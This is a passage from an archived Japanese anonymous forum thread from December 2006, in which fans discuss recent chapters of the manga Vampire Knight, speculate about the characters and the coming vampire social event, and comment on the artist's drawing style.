惚れる→咬む→駈け落ち→殺され復讐→トンズラ、枢と違って行動が超ストレート

378 :花と名無しさん:2006/12/13(水) 18:32:53 ID:???O
あーだめだ
今まであんまり月刊誌の漫画にハマったことないから
次号&コミクス発売が長すぎるorz

379 :花と名無しさん:2006/12/18(月) 03:56:01 ID:???O
樋野さん最高!!
あの画力と物語は素敵すぎる♪早く続きが読みたい!コミックス待てん。早く最後まで読みたいけど、ずっと続いて欲しいわ。

380 :花と名無しさん:2006/12/21(木) 14:30:54 ID:IfVWLxzL0
零を世界一愛してる女


ヴァンパイア騎士
略してなんて言えばいいんだ?
何がいいんだ


二番目 架院

三番目 支葵

381 :花と名無しさん:2006/12/22(金) 14:10:59 ID:???O
来月表紙&巻頭カラー50Pか。読者としては嬉しいけど大丈夫か樋野さん

382 :花と名無しさん:2006/12/22(金) 16:35:11 ID:???0
この人の漫画、数年前にとらわれの身の上を読んで
少女漫画にしてはそこまで甘すぎず自分好みの絵だなと思ってはいたんだけど
最近になって、この連載中の漫画を知って読んでみたら
男性陣(特にナイトモード)の斜め顔が安野モヨコ画化してた。
単に無意識に似ただけなのか、多少影響あるのかわからないけど
安野の描くイケメン顔はもともと好きだし、今のこの人の絵もかなり好きだ。

383 :花と名無しさん:2006/12/22(金) 20:17:09 ID:???O
優姫の初反抗イイ!と思った。
ラストの枢は優姫に怒られた八つ当りにも見えた。

384 :花と名無しさん:2006/12/22(金) 21:55:24 ID:???0
今回は特に話進まなかったけど中身濃いような気がするのは何故だろう?
次回、吸血鬼の社交界らしいけど…

385 :花と名無しさん:2006/12/23(土) 00:06:06 ID:???O
樋野まつりって可愛いの?きになんだけど、ね。うん

386 :花と名無しさん:2006/12/23(土) 00:27:16 ID:???O
可愛いよ☆"


安野モヨコもカッコイイの書くけど少し違う。

私は樋野さん派。

シュガシュガルーンは好きだけど。

387 :花と名無しさん:2006/12/23(土) 01:34:17 ID:???O
今月22日発売だね。

ヴァンパイア騎士は普通の連載?ショート?

388 :花と名無しさん:2006/12/23(土) 02:44:30 ID:???O
普通の連載。結構面白かった。

389 :花と名無しさん:2006/12/23(土) 10:02:20 ID:???O
へえ そうなんだやっぱ そう、なんさいくらいなの彼女

390 :花と名無しさん:2006/12/23(土) 10:52:04 ID:???O
零が優姫にキスしようとしたのがちょっと意外だった。
吸血鬼の愛情表現=吸血だとばかり思ってたが、普通の欲求も会ったんだな。

391 :花と名無しさん:2006/12/23(土) 14:32:50 ID:???0
元人間ですから〜
本物の吸血鬼だったら今回の名無し吸血鬼くんみたく
一気にガブッといくのかもしれんが

392 :花と名無しさん:2006/12/23(土) 15:21:03 ID:???0
名無し君を止めるために何する気だろ、洗脳?

393 :花と名無しさん:2006/12/23(土) 19:21:26 ID:???0
そういえば純血種の能力にそんなのもあるって言ってたね。>洗脳
洗脳とも違うかもしれないけど、セイレンは一条率いる探偵ごっこ組とは一味違うって感じたな。

394 :花と名無しさん:2006/12/23(土) 20:19:50 ID:???O
セイレンは夜間部の中でも特別っぽいね
枢の私兵?かと思ったけど、元老院に監視されてるらしい枢にそんな自由なさそうだし…

395 :花と名無しさん:2006/12/23(土) 22:11:15 ID:???0
探偵団は枢が一条に頼んだように見えた
何気に優姫の発言を気にしているような希ガス

396 :花と名無しさん:2006/12/23(土) 22:25:06 ID:???0
>>394
枢側がセイレンをどう思ってるんだかよく分からんな
藍堂みたいに邪険には扱わないけど

397 :花と名無しさん:2006/12/23(土) 23:56:11 ID:???0
枢に頼まれたにせよ割と自由に動いている探偵団ニ比べて、
セイレンだけが洗脳されて服従してるとかそんな感じにも見えた。
零が枢に銃口向けたときも目立ってたし、なんか特別な設定ありそうだね。

398 :花と名無しさん:2006/12/24(日) 00:12:30 ID:???0
バカな寮生捕獲にわざわざ枢自ら動いたってことは
やっぱり純血種にしか出来ないことをするつもりなんだろな
しかし何故一人で?単に引き連れて行くのがめんどかっただけかな

399 :花と名無しさん:2006/12/24(日) 00:15:24 ID:???0
しかし今回の話からどう吸血鬼の社交界へ続くのか…>次回
優姫はそんなとこ行きたいと思ってないだろうし

400 :花と名無しさん:2006/12/25(月) 14:02:27 ID:???O
今回なんか微妙。
わくわくドキドキがない。閑がいた時は毎月楽しみでドキドキしながら読んだけど、今スローでよくわからない。枢が今はダメってとめた吸血鬼は誰?

401 :花と名無しさん:2006/12/25(月) 14:37:56 ID:???O
今回の話は嵐の前の静けさ&主要キャラ三人と理事長の今の状況説明かなーと思った

402 :花と名無しさん:2006/12/25(月) 20:13:55 ID:???O
そうなんだ!だからやけに静かだったんだ。
ありがとう。


403 :花と名無しさん:2006/12/25(月) 20:55:21 ID:???0
社交界ってなるとこれまた人がたくさん出てきそうだな
予告見る限り枢が優姫を連れて行くっぽいね
あまり目立たせない方が元老院に目を付けられないと思うんだが…零も一緒するんだろうけど

404 :花と名無しさん:2006/12/25(月) 21:58:22 ID:???0
社交界に行く前に枢は優姫に謝るんだろうか?
口きいてもらえないもんな

405 :花と名無しさん:2006/12/26(火) 12:20:43 ID:???0
優姫と仲直りのきっかけ作りに誘うとか?
理事長も裏で何気に動いてるみたいだし、ようやくストーリー本編入った感じかな〜。

406 :花と名無しさん:2006/12/26(火) 15:06:20 ID:???O
仲直り半分、策略半分って気がする
わざわざ優姫を吸血鬼達に見せるような真似するからには何かあるな

407 :花と名無しさん:2006/12/26(火) 15:48:03 ID:???O
優姫はなんなの?!

枢と兄弟だったりして?

408 :花と名無しさん:2006/12/26(火) 17:09:10 ID:???0
社交界ってことは、また枢は優姫にドレス贈るのかな

409 :花と名無しさん:2006/12/27(水) 00:02:26 ID:???O
前回といい、優姫が零で頭一杯になってるとこで贈るとなると
プレゼントで気を引く作戦に見えてしまう。

410 :花と名無しさん:2006/12/28(木) 11:30:57 ID:PaFogZ49O
モノか枢さまw
しかし社交界に零連れてって大丈夫なのかな。

411 :花と名無しさん:2006/12/28(木) 13:03:05 ID:???0
零:行きたくないけど優姫が心配だからついて行く
枢:連れて行きたくないけど優姫が心配だから連れて行く

…じゃないかと

412 :花と名無しさん:2006/12/28(木) 16:22:24 ID:???O
かなめって最後死ぬのかな

67 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)